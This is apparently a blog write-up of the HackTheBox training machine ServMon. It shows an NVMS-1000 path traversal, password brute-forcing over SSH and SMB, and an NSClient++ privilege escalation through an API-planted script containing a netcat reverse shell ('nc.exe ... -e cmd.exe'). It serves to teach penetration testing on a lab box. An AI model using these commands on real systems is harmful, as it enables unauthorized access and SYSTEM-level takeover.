HackTheBox - ServMon

— Written by — 9 min read
servMon-hackthebox

ServMon just retired on Hackthebox, it’s an easy difficulty Windows box. This was my first box ever being Windows based, it was quite new to me since I didn’t use Windows for the last 7 years. Nonetheless it was good opportunity to learn a few new tricks by getting out of my confort zone.
Overall quite enjoyed this box which is -in my opinion- the perfect opportunity to start on Windows based boxes.

Tl;Dr: To get the user flag you had to retrieve a text file containing credentials by using a File Transversal vulnerability on a Network Surveillance software running on port 80. You then find a list of two users from an open FTP server. Using the credentials list found earlier you can brute-force one of the user (Nadine) password and grab the flag.
To get the root flag you had to exploit multiple vulnerabilities in NSClient++ monitoring daemon to achieve Remote Code Execution as root and read the flag.

Alright! Let’s get into the details now!

First thing first, let’s add the box IP to the hosts file:

1
[hg8@archbook ~]$ echo "10.10.10.184 servmon.htb" >> /etc/hosts

and let’s start!

User Flag

Recon

Let’s start with the classic nmap scan to see which ports are open on the box:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
[hg8@archbook ~]$ nmap -sV -sT -sC -p- servmon.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 12:02 CEST
Nmap scan report for servmon.htb (10.10.10.184)
Host is up (0.027s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE       VERSION
21/tcp    open     ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
22/tcp    open     ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp    open     http
|_http-title: Site doesn't have a title (text/html).
445/tcp   open     microsoft-ds?
8443/tcp  open     ssl/https-alt
|_ http-title: NSClient++

We have two web app running on port 80 and 8443, SMB on port 445, the FTP port 21 and finally the SSH port 22 open.

FTP anonymous login

nmap indicate that anonymous login is possible on the FTP server running on 21. It also shows that there is an Users directory inside. Looks quite promising.

Let’s take a look by ourselves:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[hg8@archbook ~]$ ftp servmon.htb
Connected to servmon.htb.
220 Microsoft FTP Service
Name (servmon.htb:hg8): anonymous
331 Anonymous access allowed.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> quit

Alright, since we have enough permission let’s download the whole Users folder to browse the content more easily:

1
2
3
4
5
6
7
8
[hg8@archbook ~]$ wget -r ftp://anonymous:@servmon.htb/
[hg8@archbook ~]$ tree servmon.htb
servmon.htb
└── Users
    ├── Nadine
    │   └── Confidential.txt
    └── Nathan
        └── Notes to do.txt
1
2
3
4
5
6
[hg8@archbook ~]$ cat "servmon.htb/Users/Nathan/Notes to do.txt"
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint% 
1
2
3
4
5
6
7
8
[hg8@archbook ~]$ cat servmon.htb/Users/Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine%

That’s interesting, according to Nadine there is a Passwords.txt file on Nathan Desktop. Let’s keep that in mind for later, it will probably come useful.

Now that we are done for the FTP Server let’s move on to the port 80.

TVT NVMS 1000 - Directory Traversal

Opening http://servom.htb display a following login page:

servmon TVT NVMS login

That’s an uncommon login page. A quick Google Search on NVMS-1000 gives us the following information :

NVMS-1000 is a monitoring client which is specially designed for network video surveillance.

http://en.tvt.net.cn/products/188.html

As with all obscure softwares let’s check if any public exploit is available.

1
2
3
4
5
6
7
8
[hg8@archbook ~]$ searchsploit "TVT NVMS 1000"
------------------------------------------------------------ ----------------------------------------
 Exploit Title                                              |  Path
                                                            | (/usr/share/exploitdb/)
------------------------------------------------------------ ----------------------------------------
TVT NVMS 1000 - Directory Traversal                         | exploits/hardware/webapps/48311.py
------------------------------------------------------------ ----------------------------------------
Shellcodes: No Results

That sound perfect for what we need.

Given the informations we got earlier we can probably retrieve the Passwords.txt file Nadine was talking about using this Directory Traversal vulnerability.

Reading the exploit code shows that we have to go back 12 levels to get to the root path. Let’s give it a try to retrieve the file located in /Users/Nathan/Desktop/ (according to Nadine note):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[hg8@archbook ~]$ curl -i --path-as-is "http://servmon.htb/../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt" 
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$%

We got a few password

Nadine account bruteforce

SSH brute force

Since SSH is open maybe one of this password will be working for Nathan user. Let’s use hydra to try brute forcing it:

1
2
3
4
5
[hg8@archbook ~]$ hydra -l Nathan -P Passwords.txt 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7 login tries (l:1/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
1 of 1 target completed, 0 valid passwords found

No luck but it’s maybe worth trying on Nadine account:

1
2
3
4
5
6
[hg8@archbook ~]$ hydra -l Nadine -P Passwords.txt 10.10.10.184 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC
[DATA] max 4 tasks per 1 server, overall 4 tasks, 7 login tries (l:1/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found

Alright we got Nadine account password: “LikeBigButts at Work”…? Well ok why not :P

SMB bruteforce

Since the SMB port 445 is open it was also possible to brute-force using this entry point. For this one I will use crackmapexec:

1
2
3
4
5
6
[hg8@archbook ~]$ crackmapexec smb 10.10.10.184 -u Nadine -p Passwords.txt
SMB  10.10.10.184    445    SERVMON  [*] Windows 10.0 Build 18362 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB  10.10.10.184    445    SERVMON  [-] ServMon\Nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB  10.10.10.184    445    SERVMON  [-] ServMon\Nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB  10.10.10.184    445    SERVMON  [-] ServMon\Nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB  10.10.10.184    445    SERVMON  [+] ServMon\Nadine:L1k3B1gBut7s@W0rk

Once again we got Nadine account credentials.

We can now connect to Nadine account trough SSH and grab the flag:

1
2
3
4
5
6
7
[hg8@archbook ~]$ ssh [email protected]
[email protected]'s password: 
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
6xxxxxxxxxxxxxxxxxxxxxxxe

Root FLag

Recon

So far we didn’t even need to look at what’s is running on port 8443. Since nothing is left at random on HackTheBox that’s probably our entry point to root.

Opening http://servom.htb:8443 display a following page:

Screenshot 2020-05-25 at 11 37 32

The web interface is really buggy and nothing can be done from there. I don’t know if it’s intended or not but anyway let’s move on.

Out of curiosity let’s check on searchsploit if any vulnerabilities are available for this NSClient++ tool:

1
2
3
4
5
6
7
8
9
[hg8@archbook ~]$ searchsploit nsclient
----------------------------------------------------------- ----------------------------------------
 Exploit Title                                             |  Path
                                                           | (/usr/share/exploitdb/)
----------------------------------------------------------- ----------------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution  | exploits/json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                 | exploits/windows/local/46802.txt
----------------------------------------------------------- ----------------------------------------
Shellcodes: No Results

Navigating to the NSPClient++ folder allows to confirm the version running is vulnerable:

1
2
PS C:\Program Files\NSClient++> .\nscp --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

We are going to skip the Authenticated Remote Code Execution since, well, we already have code execution on the machine as Nadine.
But the Privilege Escalation looks exactly what we need to get to root. Let’s take a look at it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[hg8@archbook ~]$ cat /usr/share/exploitdb/exploits/windows/local/46802.txt
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  

Exploit:
1. Grab web administrator password
- run the following that is instructed when you select forget password
        C:\Program Files\NSClient++>nscp web -- password --display
        Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
        @echo off
        c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
        nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
        - foobar
                command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
        - foobar
                interval = 1m
                command = foobar

Sounds really good, we have the detailed exploit procedure. One problem remains, most of the configuration needed in order to setup the exploit require access to the Web Interface. Unfortunately this interface is completely buggy and unstable (at least when I was working on it), so we need to find a way to access the same feature but without using the Web Interface.

After reading the documentation a little I am confident it should be possible to do so only using the API and the nscp client.
Alright let’s get into it!

NSPClient++ Privilege Escalation

First we need to retrieve the admin account password. Let’s use nspd client to do so:

1
2
PS C:\Program Files\NSClient++> .\nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

Then let’s activate CheckExternalScripts module:

1
2
3
4
PS C:\Program Files\NSClient++> .\nscp settings --activate-module CheckExternalScripts
E   schedule WE need wither duration or schedule: foobar[1936159329] = {tpl: {alias: foobar, path: /s
ettings/scheduler/schedules/foobar, is_tpl: false, parent: default, value: command = foobar, options
: { } }, command: command, channel: NSCA, source_id: , target_id: }

Now let’s download a Windows version of netcat and create our .bat reverse-shell script:

1
2
3
4
[hg8@archbook ~]$ wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
[hg8@archbook ~]$ cat hg8.bat
@echo off
C:\Temp\nc.exe 10.10.10.10 8585 -e cmd.exe

Using a scp we can send nc.exe to the box C:\Temp folder:

1
2
3
[hg8@archbook ~]$ scp nc.exe [email protected]:C:/Temp
[email protected]'s password:
nc.exe                          100%   38KB 442.0KB/s   00:00

Let’s make sure it’s been sent correctly:

1
2
3
4
5
6
7
PS C:\Program Files\NSClient++> ls C:\Temp

    Directory: C:\Temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       26/05/2020     13:46          38616 nc.exe

Alright, we have everything ready now. Let’s use NSClient++ to execute our reverse shell with elevated privileges. To do so we need to add an “External Script” and then tell NSClient++ to execute it.

Since the Web Interface is not accessible we need to use the API. Thankfully it’s almost fully documented.

The API is only accessible from localhost so I will open a SSH tunnel to make testing easier since I am more confortable working with bash than powershell:

1
[hg8@archbook ~]$ ssh -L 4444:127.0.0.1:8443 [email protected]

Now we are all setup. Let’s add our external script (the reverse shell) using the API:

1
2
[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:4444/api/v1/scripts/ext/scripts/hg8.bat --data-binary @hg8.bat
Added hg8 as scripts\hg8.bat%

We can verify our script have been added:

1
2
[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT https://localhost:4444/api/v1/scripts/ext
["hg8"]

Time to open our listener:

1
2
[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585

And use the API again to execute our script. The execute command was not so straightforward to find from the documentation but digging a little we can find it under queries endpoint:

1
[hg8@archbook ~]$ curl -k -u admin:ew2x6SsGTxjRwXOT "https://127.0.0.1:4444/api/v1/queries/hg8/commands/execute"

And on our listener a new connection open, we have a shell as nt authority\system:

1
2
3
4
5
6
7
8
9
10
11
[hg8@archbook ~]$ nc -l -vv -p 8585
Listening on any address 8585
Connection from 10.10.10.184:49746
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++> whoami
nt authority\system

C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
0xxxxxxxxxxxxxxxxxxxxx5

That’s it folks! As always do not hesitate to contact me for any questions or feedbacks!

See you next time ;)

-hg8



CTFHackTheBoxEasy Box
, , , , , , ,